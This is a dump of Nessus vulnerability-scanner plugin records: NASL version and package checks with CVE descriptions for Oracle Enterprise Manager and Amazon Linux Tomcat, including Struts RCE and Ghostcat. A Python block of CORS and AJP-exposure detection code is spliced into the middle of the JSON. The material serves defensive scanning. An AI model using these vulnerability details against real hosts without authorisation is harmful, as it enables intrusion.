script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2018-11776\",\n \"CVE-2019-0227\",\n \"CVE-2019-12415\",\n \"CVE-2020-2982\",\n \"CVE-2020-9546\"\n );\n script_bugtraq_id(105125, 107867);\n script_xref(name:\"IAVA\", value:\"2020-A-0326\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Oracle Enterprise Manager Cloud Control (Jul 2020 CPU)\");\n\n 
script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The 13.3.0.0, 13.4.0.0, and 12.1.0.5 versions of Enterprise Manager Base Platform installed on the remote host are\naffected by multiple vulnerabilities as referenced in the July 2020 CPU advisory.\n\n - Vulnerability in the Enterprise Manager Base Platform\n product of Oracle Enterprise Manager (component:\n Enterprise Manager Install (jackson-databind)).\n Supported versions that are affected are 13.3.0.0 and\n 13.4.0.0. Easily exploitable vulnerability allows\n unauthenticated attacker with network access via HTTP to\n compromise Enterprise Manager Base Platform. Successful\n attacks of this vulnerability can result in takeover of\n Enterprise Manager Base Platform. CVSS 3.1 Base Score\n 9.8 (Confidentiality, Integrity and Availability\n impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).\n (CVE-2020-9546)\n\n - Vulnerability in the Enterprise Manager Base Platform\n product of Oracle Enterprise Manager (component:\n Reporting Framework (Apache Struts 2)). Supported\n versions that are affected are 13.3.0.0 and 13.4.0.0.\n Difficult to exploit vulnerability allows\n unauthenticated attacker with network access via HTTP to\n compromise Enterprise Manager Base Platform. Successful\n attacks of this vulnerability can result in takeover of\n Enterprise Manager Base Platform. CVSS 3.1 Base Score\n 8.1 (Confidentiality, Integrity and Availability\n impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).\n (CVE-2018-11776)\n\n - Vulnerability in the Enterprise Manager Base Platform\n product of Oracle Enterprise Manager (component:\n Application Service Level Mgmt (Apache Axis)). 
Supported\n versions that are affected are 12.1.0.5 and 13.3.0.0.\n Difficult to exploit vulnerability allows\n unauthenticated attacker with access to the physical\n communication segment attached to the hardware where the\n Enterprise Manager Base Platform executes to compromise\n Enterprise Manager Base Platform. Successful attacks of\n this vulnerability can result in takeover of Enterprise\n Manager Base Platform. CVSS 3.1 Base Score 7.5\n (Confidentiality, Integrity and Availability impacts).\n CVSS Vector:\n (CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).\n (CVE-2019-0227)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/a/tech/docs/cpujul2020cvrf.xml\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/security-alerts/cpujul2020.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the July 2020 Oracle Critical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-9546\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n 
script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:enterprise_manager\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_enterprise_manager_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle Enterprise Manager Cloud Control\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp_name = 'Oracle Enterprise Manager Cloud Control';\n\napp_info = vcf::get_app_info(app:app_name);\n\n# affected versions and patches \n# (mapping added in oracle_enterprise_manager_installed.nbin)\n#\n# 13.4.0\n# 31459685 -> 13.4.0.4\n#\n# 13.3.0.0\n# 31250768 -> 13.3.0.0.200714\n#\n# 12.1.0.5\n# 31250739 -> 12.1.0.5.200714\n \nconstraints = [\n { 'min_version' : '13.4.0.0', 'fixed_version' : '13.4.0.4', 'fixed_display': '13.4.0.4 (Patch 31459685)'},\n { 'min_version' : '13.3.0.0', 'fixed_version' : '13.3.0.0.200714', 'fixed_display': '13.3.0.0.200714 (Patch 31250768)'},\n { 'min_version' : '12.1.0.5', 'fixed_version' : '12.1.0.5.200714', 'fixed_display': '12.1.0.5.200714 (Patch 31250739)' }\n];\n \nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "cvss": 
{"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-05T14:39:27", "description": "The host name verification when using TLS with the WebSocket client was missing. It is now enabled by default. Versions Affected: Apache Tomcat 9.0.0.M1 to 9.0.9, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, and 7.0.35 to 7.0.88. (CVE-2018-8034)\n\nThe URL pattern of '' (the empty string) which exactly maps to the context root was not correctly handled in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 when used as part of a security constraint definition. This caused the constraint to be ignored. It was, therefore, possible for unauthorised users to gain access to web application resources that should have been protected. Only security constraints with a URL pattern of the empty string were affected. (CVE-2018-1304)\n\nSecurity constraints defined by annotations of Servlets in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 were only applied once a Servlet had been loaded.\nBecause security constraints defined in this way apply to the URL pattern and any URLs below that point, it was possible - depending on the order Servlets were loaded - for some security constraints not to be applied. This could have exposed resources to users who were not authorised to access them. (CVE-2018-1305)\n\nThe defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins.\nIt is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue. (CVE-2018-8014)\n\nWhen using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. 
Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed: - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations. (CVE-2020-1938)\n\nAs part of our fix for this CVE, we are disabling Tomcat's AJP connector in the default configuration in alignment with the upstream changes. This change will require customers who use the default Tomcat configuration (in which the AJP connector was previously enabled) to explicitly re-enable the connector if they need it. 
Also take note that a connector configured without an explicit address will only bind to the loopback address.\n\nExamples of output from netstat before and after updating tomcat8 and tomcat7 are below (note that it is the same on AL1 and AL2 with both tomcat7 and tomcat8).\n\nAL2 tomcat8.5 :\n\nbefore :\n\ntcp6 0 0 :::8009 :::* LISTEN 25772/java\n\ntcp6 0 0 :::8080 :::* LISTEN 25772/java\n\ntcp6 0 0 127.0.0.1:8005 :::* LISTEN 25772/java\n\nAfter :\n\ntcp6 0 0 :::8080 :::* LISTEN 25772/java\n\ntcp6 0 0 127.0.0.1:8005 :::* LISTEN 25772/java\n\nTo re-enable the AJP port in Tomcat, users can follow the steps below :\n\n1) For AL2 Core (tomcat7): Uncomment the following line in /etc/tomcat/server.xml and restart the service\n\n<!--\n\n<Connector port='8009' protocol='AJP/1.3' redirectPort='8443' />\n\n-->\n\n2) For AL2 Tomcat8.5 extra: Uncomment the following line in /etc/tomcat/server.xml and restart the service\n\n<!--\n\n<Connector protocol='AJP/1.3'\n\naddress='::1'\n\nport='8009'\n\nredirectPort='8443' />\n\n-->\n\nSee also :\n\nApache Tomcat release notes\n\nTomcat 7\n\n<a href='http://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_ 8.5.51'>Tomcat 8\n\nRedHat <a href='https://access.redhat.com/solutions/4851251'>solutions", "cvss3": {}, "published": "2020-03-16T00:00:00", "type": "nessus", "title": "Amazon Linux 2 : tomcat (ALAS-2020-1402)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-1304", "CVE-2018-1305", "CVE-2018-8014", "CVE-2018-8034", "CVE-2020-1938"], "modified": "2023-01-11T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:tomcat", "p-cpe:/a:amazon:linux:tomcat-admin-webapps", "p-cpe:/a:amazon:linux:tomcat-docs-webapp", "p-cpe:/a:amazon:linux:tomcat-el-2.2-api", "p-cpe:/a:amazon:linux:tomcat-javadoc", "p-cpe:/a:amazon:linux:tomcat-jsp-2.2-api", "p-cpe:/a:amazon:linux:tomcat-jsvc", "p-cpe:/a:amazon:linux:tomcat-lib", "p-cpe:/a:amazon:linux:tomcat-servlet-3.0-api", "p-cpe:/a:amazon:linux:tomcat-webapps", "cpe:/o:amazon:linux:2"], 
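Two checks a practitioner would run on a Tomcat host against the advisory above, as an added example that is not part of the Amazon advisory or the Tenable plugin. The first is for CVE-2018-8014: a response to a request carrying an attacker-chosen Origin is classified as leaking credentials when that origin is reflected together with Access-Control-Allow-Credentials: true, which is what Tomcat's CORS filter answers when any origin is allowed and supportsCredentials is on. The second is for CVE-2020-1938: the netstat/ss listing is parsed for port 8009 and each listener is flagged unless it is bound to loopback. The netstat lines are the advisory's own before/after output; the probe origin, the HTTP responses and the ss-style line are constructed.

```python
from typing import Dict, List, Tuple

# CVE-2018-8014: the CORS filter at its defaults reflects any Origin and adds
# Access-Control-Allow-Credentials: true, so a page on an attacker's site can
# make cookie-authenticated requests to the application and read the replies.


def cors_credential_leak(probe_origin: str, response_headers: Dict[str, str]) -> bool:
    """Classify one response to a request that carried `Origin: probe_origin`.

    True when that origin is reflected AND credentials are allowed. A bare '*'
    is not counted because browsers refuse to pair it with credentials. Probe
    with an origin nobody legitimately serves, so a match can only be reflection.
    """
    h = {k.lower(): v.strip() for k, v in response_headers.items()}
    allow_origin = h.get("access-control-allow-origin", "")
    allow_creds = h.get("access-control-allow-credentials", "").lower() == "true"
    return allow_creds and allow_origin == probe_origin


# CVE-2020-1938: the AJP connector must not be reachable from untrusted hosts.
# The advisory's before/after netstat listings are the evidence to look for:
# port 8009 on the wildcard address versus absent or bound to loopback only.

AJP_PORT = 8009
LOOPBACK = {"127.0.0.1", "::1"}


def ajp_listeners(listing: str, port: int = AJP_PORT) -> List[Tuple[str, bool]]:
    """Parse `netstat -tlnp` or `ss -tlnp` output.

    Returns (bound address, exposed) for each LISTEN socket on `port`. Exposed
    is True unless the bind address is loopback; wildcard binds as printed by
    either tool (':::8009', '0.0.0.0:8009', '*:8009', '[::]:8009') are exposed.
    """
    found = []
    for line in listing.splitlines():
        fields = line.split()
        if "LISTEN" not in fields or len(fields) < 4:
            continue
        addr, sep, p = fields[3].rpartition(":")   # local address column in both tools
        if not sep or p != str(port):
            continue
        addr = addr.strip("[]")
        found.append((addr, addr not in LOOPBACK))
    return found


# --- sample inputs ----------------------------------------------------------
PROBE_ORIGIN = "https://attacker.invalid"   # constructed; .invalid is never a real site

# Constructed responses, not captured from a real server.
DEFAULT_CORS_FILTER = {      # unconfigured filter: origin reflected plus credentials
    "Access-Control-Allow-Origin": "https://attacker.invalid",
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Origin",
}
HARDENED_CORS_FILTER = {     # cors.allowed.origins set: unknown origin gets no CORS headers
    "Content-Type": "text/html",
}
PUBLIC_NO_CREDS = {          # wildcard without credentials: readable, but no cookies sent
    "Access-Control-Allow-Origin": "*",
}

# netstat lines quoted from the advisory above (AL2 tomcat8.5, before and after)
BEFORE_UPDATE = """\
tcp6 0 0 :::8009 :::* LISTEN 25772/java
tcp6 0 0 :::8080 :::* LISTEN 25772/java
tcp6 0 0 127.0.0.1:8005 :::* LISTEN 25772/java
"""
AFTER_UPDATE = """\
tcp6 0 0 :::8080 :::* LISTEN 25772/java
tcp6 0 0 127.0.0.1:8005 :::* LISTEN 25772/java
"""
# constructed: connector re-enabled with address='::1' as the advisory's snippet shows
REENABLED_ON_LOOPBACK = "tcp6 0 0 ::1:8009 :::* LISTEN 25772/java\n"
# constructed: the same wildcard bind as `ss -tlnp` would print it
SS_STYLE = 'LISTEN 0 100 [::]:8009 [::]:* users:(("java",pid=25772,fd=50))\n'

if __name__ == "__main__":
    for name, hdrs in [("default", DEFAULT_CORS_FILTER), ("hardened", HARDENED_CORS_FILTER),
                       ("public", PUBLIC_NO_CREDS)]:
        print(f"CORS {name:8s} leak={cors_credential_leak(PROBE_ORIGIN, hdrs)}")
    for name, out in [("before", BEFORE_UPDATE), ("after", AFTER_UPDATE),
                      ("loopback", REENABLED_ON_LOOPBACK)]:
        print(f"AJP  {name:8s} {ajp_listeners(out)}")
```

For the CORS check, send a request with the probe origin to an endpoint behind the filter and pass the response headers in; a loopback-only AJP listener is still worth noting, since anything that can reach 127.0.0.1 or ::1 on the host (a proxy, a sidecar, another local user) gets the elevated trust the advisory describes.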
"id": "AL2_ALAS-2020-1402.NASL", "href": "https://www.tenable.com/plugins/nessus/134569", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2 Security Advisory ALAS-2020-1402.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134569);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/11\");\n\n script_cve_id(\n \"CVE-2018-1304\",\n \"CVE-2018-1305\",\n \"CVE-2018-8014\",\n \"CVE-2018-8034\",\n \"CVE-2020-1938\"\n );\n script_xref(name:\"ALAS\", value:\"2020-1402\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0021\");\n\n script_name(english:\"Amazon Linux 2 : tomcat (ALAS-2020-1402)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux 2 host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The host name verification when using TLS with the WebSocket client\nwas missing. It is now enabled by default. Versions Affected: Apache\nTomcat 9.0.0.M1 to 9.0.9, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, and\n7.0.35 to 7.0.88. (CVE-2018-8034)\n\nThe URL pattern of '' (the empty string) which exactly maps to the\ncontext root was not correctly handled in Apache Tomcat 9.0.0.M1 to\n9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 when\nused as part of a security constraint definition. This caused the\nconstraint to be ignored. It was, therefore, possible for unauthorised\nusers to gain access to web application resources that should have\nbeen protected. Only security constraints with a URL pattern of the\nempty string were affected. 
(CVE-2018-1304)\n\nSecurity constraints defined by annotations of Servlets in Apache\nTomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and\n7.0.0 to 7.0.84 were only applied once a Servlet had been loaded.\nBecause security constraints defined in this way apply to the URL\npattern and any URLs below that point, it was possible - depending on\nthe order Servlets were loaded - for some security constraints not to\nbe applied. This could have exposed resources to users who were not\nauthorised to access them. (CVE-2018-1305)\n\nThe defaults settings for the CORS filter provided in Apache Tomcat\n9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to\n7.0.88 are insecure and enable 'supportsCredentials' for all origins.\nIt is expected that users of the CORS filter will have configured it\nappropriately for their environment rather than using it in the\ndefault configuration. Therefore, it is expected that most users will\nnot be impacted by this issue. (CVE-2018-8014)\n\nWhen using the Apache JServ Protocol (AJP), care must be taken when\ntrusting incoming connections to Apache Tomcat. Tomcat treats AJP\nconnections as having higher trust than, for example, a similar HTTP\nconnection. If such connections are available to an attacker, they can\nbe exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1\nto 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with\nan AJP Connector enabled by default that listened on all configured IP\naddresses. It was expected (and recommended in the security guide)\nthat this Connector would be disabled if not required. 
This\nvulnerability report identified a mechanism that allowed: - returning\narbitrary files from anywhere in the web application - processing any\nfile in the web application as a JSP Further, if the web application\nallowed file upload and stored those files within the web application\n(or the attacker was able to control the content of the web\napplication by some other means) then this, along with the ability to\nprocess a file as a JSP, made remote code execution possible. It is\nimportant to note that mitigation is only required if an AJP port is\naccessible to untrusted users. Users wishing to take a\ndefence-in-depth approach and block the vector that permits returning\narbitrary files and execution as JSP may upgrade to Apache Tomcat\n9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to\nthe default AJP Connector configuration in 9.0.31 to harden the\ndefault configuration. It is likely that users upgrading to 9.0.31,\n8.5.51 or 7.0.100 or later will need to make small changes to their\nconfigurations. (CVE-2020-1938)\n\nAs part of our fix for this CVE, we are disabling Tomcat's AJP\nconnector in the default configuration in alignment with the upstream\nchanges. This change will require customers who use the default Tomcat\nconfiguration (in which the AJP connector was previously enabled) to\nexplicitly re-enable the connector if they need it. 
Also take note\nthat a connector configured without an explicit address will only bind\nto the loopback address.\n\nExamples of output from netstat before and after updating tomcat8 and\ntomcat7 are below (note that it is the same on AL1 and AL2 with both\ntomcat7 and tomcat8).\n\nAL2 tomcat8.5 :\n\nbefore :\n\ntcp6 0 0 :::8009 :::* LISTEN 25772/java\n\ntcp6 0 0 :::8080 :::* LISTEN 25772/java\n\ntcp6 0 0 127.0.0.1:8005 :::* LISTEN 25772/java\n\nAfter :\n\ntcp6 0 0 :::8080 :::* LISTEN 25772/java\n\ntcp6 0 0 127.0.0.1:8005 :::* LISTEN 25772/java\n\nTo re-enable the AJP port in Tomcat, users can follow the steps \nbelow :\n\n1) For AL2 Core (tomcat7): Uncomment the following line in\n/etc/tomcat/server.xml and restart the service\n\n<!--\n\n<Connector port='8009' protocol='AJP/1.3' redirectPort='8443' />\n\n-->\n\n2) For AL2 Tomcat8.5 extra: Uncomment the following line in\n/etc/tomcat/server.xml and restart the service\n\n<!--\n\n<Connector protocol='AJP/1.3'\n\naddress='::1'\n\nport='8009'\n\nredirectPort='8443' />\n\n-->\n\nSee also :\n\nApache Tomcat release notes\n\nTomcat 7\n\nTomcat 8 : http://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.5.51\n\nRedHat solutions : https://access.redhat.com/solutions/4851251\");\n # http://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.100\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?177285c3\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/AL2/ALAS-2020-1402.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update tomcat' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", 
value:\"CVE-2020-1938\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"2\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"AL2\", reference:\"tomcat-7.0.76-10.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"tomcat-admin-webapps-7.0.76-10.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"tomcat-docs-webapp-7.0.76-10.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"tomcat-el-2.2-api-7.0.76-10.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"tomcat-javadoc-7.0.76-10.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"tomcat-jsp-2.2-api-7.0.76-10.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"tomcat-jsvc-7.0.76-10.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"tomcat-lib-7.0.76-10.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"tomcat-servlet-3.0-api-7.0.76-10.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"tomcat-webapps-7.0.76-10.amzn2.0.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = 
pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat / tomcat-admin-webapps / tomcat-docs-webapp / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-30T17:04:28", "description": "The version of Oracle Enterprise Manager Cloud Control installed on the remote host is affected by multiple vulnerabilities in the Enterprise Manager Base Platform component:\n\n - An unspecified vulnerability in the Enterprise Manager Base Platform component of Oracle Enterprise Manager Products Suite (subcomponent: Connector Framework (Apache CXF)), which could allow an unauthenticated, remote attacker to compromise Enterprise Manager Base Platform. (CVE-2018-8039)\n\n - An unspecified vulnerability in the Oracle Enterprise Manager Base Platform component of Oracle Enterprise Manager Products Suite (subcomponent: Valid Session (Apache ActiveMQ)), which could allow an unauthenticated, remote attacker to compromise Oracle Enterprise Manager Base Platform. (CVE-2019-0222)\n\n - An unspecified vulnerability in the Enterprise Manager Base Platform component of Oracle Enterprise Manager Products Suite (subcomponent: Discovery Framework (OpenSSL)), which could allow an unauthenticated, remote attacker to compromise Enterprise Manager Base Platform. 
(CVE-2019-1559)", "cvss3": {}, "published": "2019-07-17T00:00:00", "type": "nessus", "title": "Oracle Enterprise Manager Cloud Control (Jul 2019 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11775", "CVE-2018-1258", "CVE-2018-8039", "CVE-2019-0222", "CVE-2019-1559"], "modified": "2022-12-06T00:00:00", "cpe": ["cpe:/a:oracle:enterprise_manager"], "id": "ORACLE_ENTERPRISE_MANAGER_JUL_2019_CPU.NASL", "href": "https://www.tenable.com/plugins/nessus/126775", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(126775);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\n \"CVE-2018-1258\",\n \"CVE-2018-8039\",\n \"CVE-2018-11775\",\n \"CVE-2019-0222\",\n \"CVE-2019-1559\"\n );\n script_bugtraq_id(\n 104222,\n 105335,\n 106357,\n 107174,\n 107622\n );\n script_xref(name:\"IAVA\", value:\"2019-A-0251\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n\n script_name(english:\"Oracle Enterprise Manager Cloud Control (Jul 2019 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An enterprise management application installed on the remote host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle Enterprise Manager Cloud Control installed on\nthe remote host is affected by multiple vulnerabilities in\nEnterprise Manager Base Platform component:\n\n - An unspecified vulnerability in the Enterprise Manager Base Platform component of\n Oracle Enterprise Manager Products Suite (subcomponent: Connector Framework (Apache CXF)),\n which could allow an unauthenticated, remote attacker to compromise\n Enterprise Manager Base Platform. 
